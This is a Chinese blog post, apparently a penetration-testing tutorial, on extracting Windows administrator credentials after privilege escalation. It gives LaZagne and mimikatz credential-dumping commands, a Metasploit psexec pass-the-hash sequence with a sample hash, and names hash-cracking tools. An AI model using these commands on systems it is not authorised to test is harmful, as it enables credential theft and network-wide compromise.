权限提升之——windows提权后期密码安全性测试

提权后期密码安全性测试

虽然我们已经有了管理员权限,但是我们最好是有管理员密码进行扩展攻击,很多管理员账号密码都设置成一样的,攻下一台就可以拿下所有,同时远程连接时,比如使用木马,很容易被发现或者清理,如果用管理员账号,可以清除渗透,也就是对操作系统和服务器不产生影响的情况下,尤其是正规渗透测试过程中,都是取得管理员账号密码,登录3389端口或反端口连接者证明为成功
简单地说就是从 获取管理员权限——>获取管理员账号

一、本地管理员密码提取

本地管理员密码如何直接提取
工具
lazagne

lazagne.exe/?>>1.txt

mimikatz(巴西烤肉)
第一条:

privilege::debug  
						//提升权限
				第二条:
sekurlsa::logonpa
						ssWords  //抓取密码

二、本地Hash远程直接登录

遇到高版本的系统密码不是明文的情况下,我们通过哈希值来取得管理员账号
主要通过MSF提供的exploit/windows/smb/psexec模块来完成。

msf >use exploit/windows/smb/psexec
			msf >set RHOST 192.168.1.109
			msf >set SMBUser administrator(管理员账号名称)
			msf >set SMBPass 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4(哈希值  从500: 开始 到::: 结束)
			msf >exploit
			msf >shell

show targets 查看攻击目标
show options 查看配置选项

三、hash密钥暴力破解

一、通过LC5暴力破解Hash密码

使用gmer直接提权SAM和system文件或用Pwdump7提取hash,最后使用LC5破解。

二、使用Ophcrack破解系统Hash密码
http://simeon.blog.51cto.com/18680/122160

三、在线破解

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章